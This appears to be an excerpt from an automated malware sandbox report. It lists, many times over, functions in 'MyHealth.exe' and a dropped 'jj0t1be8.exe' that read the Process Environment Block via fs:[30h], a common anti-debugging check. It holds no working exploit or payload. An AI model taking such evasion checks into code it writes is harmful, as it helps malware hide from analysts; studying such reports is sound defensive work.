Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_3_001206CE mov eax, dword ptr fs:[00000030h] 2_3_001206CE
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_3_001206CE mov eax, dword ptr fs:[00000030h] 2_3_001206CE
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_3_000D47D7 mov eax, dword ptr fs:[00000030h] 2_3_000D47D7
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_3_0011FC80 mov eax, dword ptr fs:[00000030h] 2_3_0011FC80
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F50DF40 mov eax, dword ptr fs:[00000030h] 2_2_1F50DF40
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F572F40 mov eax, dword ptr fs:[00000030h] 2_2_1F572F40
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F539F7A mov eax, dword ptr fs:[00000030h] 2_2_1F539F7A
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F50EF60 mov eax, dword ptr fs:[00000030h] 2_2_1F50EF60
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F521F10 mov eax, dword ptr fs:[00000030h] 2_2_1F521F10
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F521F10 mov eax, dword ptr fs:[00000030h] 2_2_1F521F10
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F5B2F18 mov eax, dword ptr fs:[00000030h] 2_2_1F5B2F18
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F5B2F18 mov eax, dword ptr fs:[00000030h] 2_2_1F5B2F18
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F5B2F18 mov eax, dword ptr fs:[00000030h] 2_2_1F5B2F18
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F506F05 mov eax, dword ptr fs:[00000030h] 2_2_1F506F05
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F506F05 mov eax, dword ptr fs:[00000030h] 2_2_1F506F05
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F506F05 mov eax, dword ptr fs:[00000030h] 2_2_1F506F05
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F506F05 mov eax, dword ptr fs:[00000030h] 2_2_1F506F05
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F506F05 mov eax, dword ptr fs:[00000030h] 2_2_1F506F05
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F5BDF39 mov eax, dword ptr fs:[00000030h] 2_2_1F5BDF39
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F4F2FD0 mov eax, dword ptr fs:[00000030h] 2_2_1F4F2FD0
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F4F2FD0 mov eax, dword ptr fs:[00000030h] 2_2_1F4F2FD0
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F4F2FD0 mov eax, dword ptr fs:[00000030h] 2_2_1F4F2FD0
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F4F2FD0 mov ecx, dword ptr fs:[00000030h] 2_2_1F4F2FD0
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F4F2FD0 mov eax, dword ptr fs:[00000030h] 2_2_1F4F2FD0
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F4F2FD0 mov eax, dword ptr fs:[00000030h] 2_2_1F4F2FD0
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F4F2FD0 mov eax, dword ptr fs:[00000030h] 2_2_1F4F2FD0
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F4F2FD0 mov eax, dword ptr fs:[00000030h] 2_2_1F4F2FD0
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F4F2FD0 mov eax, dword ptr fs:[00000030h] 2_2_1F4F2FD0
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F4F2FD0 mov eax, dword ptr fs:[00000030h] 2_2_1F4F2FD0
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F4F2FD0 mov eax, dword ptr fs:[00000030h] 2_2_1F4F2FD0
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F4F3FE5 mov eax, dword ptr fs:[00000030h] 2_2_1F4F3FE5
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F4F3FE5 mov eax, dword ptr fs:[00000030h] 2_2_1F4F3FE5
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F4F3FE5 mov eax, dword ptr fs:[00000030h] 2_2_1F4F3FE5
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F5BAF81 mov eax, dword ptr fs:[00000030h] 2_2_1F5BAF81
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F5BAF81 mov eax, dword ptr fs:[00000030h] 2_2_1F5BAF81
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F5BAF81 mov eax, dword ptr fs:[00000030h] 2_2_1F5BAF81
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F5BAF81 mov eax, dword ptr fs:[00000030h] 2_2_1F5BAF81
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F5BFFAC mov eax, dword ptr fs:[00000030h] 2_2_1F5BFFAC
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F5BFFAC mov eax, dword ptr fs:[00000030h] 2_2_1F5BFFAC
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F52DE50 mov eax, dword ptr fs:[00000030h] 2_2_1F52DE50
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F4FCE50 mov eax, dword ptr fs:[00000030h] 2_2_1F4FCE50
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F525E70 mov eax, dword ptr fs:[00000030h] 2_2_1F525E70
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F525E70 mov eax, dword ptr fs:[00000030h] 2_2_1F525E70
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F525E70 mov eax, dword ptr fs:[00000030h] 2_2_1F525E70
Source: C:\Users\user\Desktop\MyHealth.exe -- Code function: 2_2_1F525E70 mov eax, dword ptr fs:[00000030h] 2_2_1F525E70
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 15_2_02A523AB mov eax, dword ptr fs:[00000030h] 15_2_02A523AB
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 15_2_02A506B1 mov eax, dword ptr fs:[00000030h] 15_2_02A506B1
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 15_2_02A52189 mov eax, dword ptr fs:[00000030h] 15_2_02A52189
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 15_2_02A511F0 mov eax, dword ptr fs:[00000030h] 15_2_02A511F0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 15_2_02A50B26 mov eax, dword ptr fs:[00000030h] 15_2_02A50B26
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 15_2_02A5214E mov eax, dword ptr fs:[00000030h] 15_2_02A5214E
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F442F40 mov eax, dword ptr fs:[00000030h] 16_2_1F442F40
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F473740 mov eax, dword ptr fs:[00000030h] 16_2_1F473740
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3F1F10 mov eax, dword ptr fs:[00000030h] 16_2_1F3F1F10
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3F1F10 mov eax, dword ptr fs:[00000030h] 16_2_1F3F1F10
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3D6F05 mov eax, dword ptr fs:[00000030h] 16_2_1F3D6F05
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3D6F05 mov eax, dword ptr fs:[00000030h] 16_2_1F3D6F05
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3D6F05 mov eax, dword ptr fs:[00000030h] 16_2_1F3D6F05
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3D6F05 mov eax, dword ptr fs:[00000030h] 16_2_1F3D6F05
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3D6F05 mov eax, dword ptr fs:[00000030h] 16_2_1F3D6F05
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F409F7A mov eax, dword ptr fs:[00000030h] 16_2_1F409F7A
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F49870A mov eax, dword ptr fs:[00000030h] 16_2_1F49870A
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F482F18 mov eax, dword ptr fs:[00000030h] 16_2_1F482F18
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F482F18 mov eax, dword ptr fs:[00000030h] 16_2_1F482F18
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F482F18 mov eax, dword ptr fs:[00000030h] 16_2_1F482F18
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3DEF60 mov eax, dword ptr fs:[00000030h] 16_2_1F3DEF60
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F48DF39 mov eax, dword ptr fs:[00000030h] 16_2_1F48DF39
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3EC74A mov eax, dword ptr fs:[00000030h] 16_2_1F3EC74A
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3EC74A mov eax, dword ptr fs:[00000030h] 16_2_1F3EC74A
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3F5744 mov eax, dword ptr fs:[00000030h] 16_2_1F3F5744
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3F5744 mov eax, dword ptr fs:[00000030h] 16_2_1F3F5744
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3DDF40 mov eax, dword ptr fs:[00000030h] 16_2_1F3DDF40
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3EA7B6 mov eax, dword ptr fs:[00000030h] 16_2_1F3EA7B6
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F4467C9 mov eax, dword ptr fs:[00000030h] 16_2_1F4467C9
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F4467C9 mov eax, dword ptr fs:[00000030h] 16_2_1F4467C9
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F4467C9 mov eax, dword ptr fs:[00000030h] 16_2_1F4467C9
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F4467C9 mov ecx, dword ptr fs:[00000030h] 16_2_1F4467C9
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F4467C9 mov eax, dword ptr fs:[00000030h] 16_2_1F4467C9
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F4467C9 mov eax, dword ptr fs:[00000030h] 16_2_1F4467C9
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F47F7D3 mov eax, dword ptr fs:[00000030h] 16_2_1F47F7D3
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3EE79A mov eax, dword ptr fs:[00000030h] 16_2_1F3EE79A
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F48F7E2 mov eax, dword ptr fs:[00000030h] 16_2_1F48F7E2
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F48F7E2 mov eax, dword ptr fs:[00000030h] 16_2_1F48F7E2
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F48F7E2 mov eax, dword ptr fs:[00000030h] 16_2_1F48F7E2
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F48F7E2 mov eax, dword ptr fs:[00000030h] 16_2_1F48F7E2
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3E5790 mov eax, dword ptr fs:[00000030h] 16_2_1F3E5790
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3E5790 mov ecx, dword ptr fs:[00000030h] 16_2_1F3E5790
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3E5790 mov ecx, dword ptr fs:[00000030h] 16_2_1F3E5790
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3E5790 mov eax, dword ptr fs:[00000030h] 16_2_1F3E5790
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3E5790 mov ecx, dword ptr fs:[00000030h] 16_2_1F3E5790
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3E5790 mov ecx, dword ptr fs:[00000030h] 16_2_1F3E5790
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3E5790 mov eax, dword ptr fs:[00000030h] 16_2_1F3E5790
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3E5790 mov eax, dword ptr fs:[00000030h] 16_2_1F3E5790
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3E5790 mov eax, dword ptr fs:[00000030h] 16_2_1F3E5790
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3E5790 mov eax, dword ptr fs:[00000030h] 16_2_1F3E5790
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3E5790 mov eax, dword ptr fs:[00000030h] 16_2_1F3E5790
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3E5790 mov eax, dword ptr fs:[00000030h] 16_2_1F3E5790
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3E5790 mov eax, dword ptr fs:[00000030h] 16_2_1F3E5790
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3E5790 mov eax, dword ptr fs:[00000030h] 16_2_1F3E5790
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3E5790 mov eax, dword ptr fs:[00000030h] 16_2_1F3E5790
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3E5790 mov eax, dword ptr fs:[00000030h] 16_2_1F3E5790
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3E5790 mov eax, dword ptr fs:[00000030h] 16_2_1F3E5790
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3E5790 mov eax, dword ptr fs:[00000030h] 16_2_1F3E5790
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3E5790 mov eax, dword ptr fs:[00000030h] 16_2_1F3E5790
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F4787F1 mov eax, dword ptr fs:[00000030h] 16_2_1F4787F1
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3F47FD mov esi, dword ptr fs:[00000030h] 16_2_1F3F47FD
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exe -- Code function: 16_2_1F3F47FD mov eax, dword ptr fs:[00000030h] 16_2_1F3F47FD
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F47FD mov eax, dword ptr fs:[00000030h]16_2_1F3F47FD
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F48AF81 mov eax, dword ptr fs:[00000030h]16_2_1F48AF81
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F48AF81 mov eax, dword ptr fs:[00000030h]16_2_1F48AF81
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F48AF81 mov eax, dword ptr fs:[00000030h]16_2_1F48AF81
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F48AF81 mov eax, dword ptr fs:[00000030h]16_2_1F48AF81
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F482782 mov eax, dword ptr fs:[00000030h]16_2_1F482782
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F482782 mov eax, dword ptr fs:[00000030h]16_2_1F482782
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F482782 mov eax, dword ptr fs:[00000030h]16_2_1F482782
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F482782 mov eax, dword ptr fs:[00000030h]16_2_1F482782
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F482782 mov eax, dword ptr fs:[00000030h]16_2_1F482782
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F482782 mov eax, dword ptr fs:[00000030h]16_2_1F482782
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F482782 mov eax, dword ptr fs:[00000030h]16_2_1F482782
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3CE7F3 mov eax, dword ptr fs:[00000030h]16_2_1F3CE7F3
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3D77ED mov eax, dword ptr fs:[00000030h]16_2_1F3D77ED
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C3FE5 mov eax, dword ptr fs:[00000030h]16_2_1F3C3FE5
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C3FE5 mov eax, dword ptr fs:[00000030h]16_2_1F3C3FE5
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C3FE5 mov eax, dword ptr fs:[00000030h]16_2_1F3C3FE5
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F48FFAC mov eax, dword ptr fs:[00000030h]16_2_1F48FFAC
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F48FFAC mov eax, dword ptr fs:[00000030h]16_2_1F48FFAC
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C2FD0 mov eax, dword ptr fs:[00000030h]16_2_1F3C2FD0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C2FD0 mov eax, dword ptr fs:[00000030h]16_2_1F3C2FD0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C2FD0 mov eax, dword ptr fs:[00000030h]16_2_1F3C2FD0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C2FD0 mov ecx, dword ptr fs:[00000030h]16_2_1F3C2FD0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C2FD0 mov eax, dword ptr fs:[00000030h]16_2_1F3C2FD0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C2FD0 mov eax, dword ptr fs:[00000030h]16_2_1F3C2FD0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C2FD0 mov eax, dword ptr fs:[00000030h]16_2_1F3C2FD0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C2FD0 mov eax, dword ptr fs:[00000030h]16_2_1F3C2FD0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C2FD0 mov eax, dword ptr fs:[00000030h]16_2_1F3C2FD0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C2FD0 mov eax, dword ptr fs:[00000030h]16_2_1F3C2FD0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C2FD0 mov eax, dword ptr fs:[00000030h]16_2_1F3C2FD0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C1638 mov eax, dword ptr fs:[00000030h]16_2_1F3C1638
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3EFE37 mov eax, dword ptr fs:[00000030h]16_2_1F3EFE37
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3FCE34 mov eax, dword ptr fs:[00000030h]16_2_1F3FCE34
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3FCE34 mov eax, dword ptr fs:[00000030h]16_2_1F3FCE34
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F405651 mov eax, dword ptr fs:[00000030h]16_2_1F405651
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F405651 mov eax, dword ptr fs:[00000030h]16_2_1F405651
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F2616 mov eax, dword ptr fs:[00000030h]16_2_1F3F2616
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3CA60B mov eax, dword ptr fs:[00000030h]16_2_1F3CA60B
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3CA60B mov eax, dword ptr fs:[00000030h]16_2_1F3CA60B
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3E2600 mov eax, dword ptr fs:[00000030h]16_2_1F3E2600
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3FA675 mov eax, dword ptr fs:[00000030h]16_2_1F3FA675
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3CCE70 mov ecx, dword ptr fs:[00000030h]16_2_1F3CCE70
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F481606 mov eax, dword ptr fs:[00000030h]16_2_1F481606
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F481606 mov eax, dword ptr fs:[00000030h]16_2_1F481606
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F481606 mov eax, dword ptr fs:[00000030h]16_2_1F481606
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F481606 mov eax, dword ptr fs:[00000030h]16_2_1F481606
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F481606 mov eax, dword ptr fs:[00000030h]16_2_1F481606
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F481606 mov eax, dword ptr fs:[00000030h]16_2_1F481606
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F481606 mov eax, dword ptr fs:[00000030h]16_2_1F481606
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F481606 mov eax, dword ptr fs:[00000030h]16_2_1F481606
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F481606 mov eax, dword ptr fs:[00000030h]16_2_1F481606
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F481606 mov eax, dword ptr fs:[00000030h]16_2_1F481606
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F481606 mov eax, dword ptr fs:[00000030h]16_2_1F481606
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F481606 mov eax, dword ptr fs:[00000030h]16_2_1F481606
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F481606 mov eax, dword ptr fs:[00000030h]16_2_1F481606
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F481606 mov eax, dword ptr fs:[00000030h]16_2_1F481606
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F44660A mov eax, dword ptr fs:[00000030h]16_2_1F44660A
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F44660A mov eax, dword ptr fs:[00000030h]16_2_1F44660A
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F44660A mov eax, dword ptr fs:[00000030h]16_2_1F44660A
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F44660A mov eax, dword ptr fs:[00000030h]16_2_1F44660A
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F5E70 mov eax, dword ptr fs:[00000030h]16_2_1F3F5E70
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F5E70 mov eax, dword ptr fs:[00000030h]16_2_1F3F5E70
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F5E70 mov eax, dword ptr fs:[00000030h]16_2_1F3F5E70
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F5E70 mov eax, dword ptr fs:[00000030h]16_2_1F3F5E70
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F4E61 mov eax, dword ptr fs:[00000030h]16_2_1F3F4E61
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F4E61 mov eax, dword ptr fs:[00000030h]16_2_1F3F4E61
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F4E61 mov eax, dword ptr fs:[00000030h]16_2_1F3F4E61
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3CCE50 mov eax, dword ptr fs:[00000030h]16_2_1F3CCE50
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3FDE50 mov eax, dword ptr fs:[00000030h]16_2_1F3FDE50
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F45BE30 mov eax, dword ptr fs:[00000030h]16_2_1F45BE30
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F45BE30 mov eax, dword ptr fs:[00000030h]16_2_1F45BE30
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F66B4 mov eax, dword ptr fs:[00000030h]16_2_1F3F66B4
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F66B4 mov eax, dword ptr fs:[00000030h]16_2_1F3F66B4
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F66B4 mov eax, dword ptr fs:[00000030h]16_2_1F3F66B4
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F66B4 mov eax, dword ptr fs:[00000030h]16_2_1F3F66B4
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F66B4 mov eax, dword ptr fs:[00000030h]16_2_1F3F66B4
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F66B4 mov eax, dword ptr fs:[00000030h]16_2_1F3F66B4
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F66B4 mov eax, dword ptr fs:[00000030h]16_2_1F3F66B4
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F66B4 mov eax, dword ptr fs:[00000030h]16_2_1F3F66B4
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F66B4 mov eax, dword ptr fs:[00000030h]16_2_1F3F66B4
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F66B4 mov eax, dword ptr fs:[00000030h]16_2_1F3F66B4
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3F66B4 mov eax, dword ptr fs:[00000030h]16_2_1F3F66B4
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F4066D0 mov eax, dword ptr fs:[00000030h]16_2_1F4066D0
Source: C:\Program Files (x86)\G8prdul4\jj0t1be8.exeCode function: 16_2_1F3C3EA0 mov eax, dword ptr fs:[00000030h]16_2_1F3C3EA0
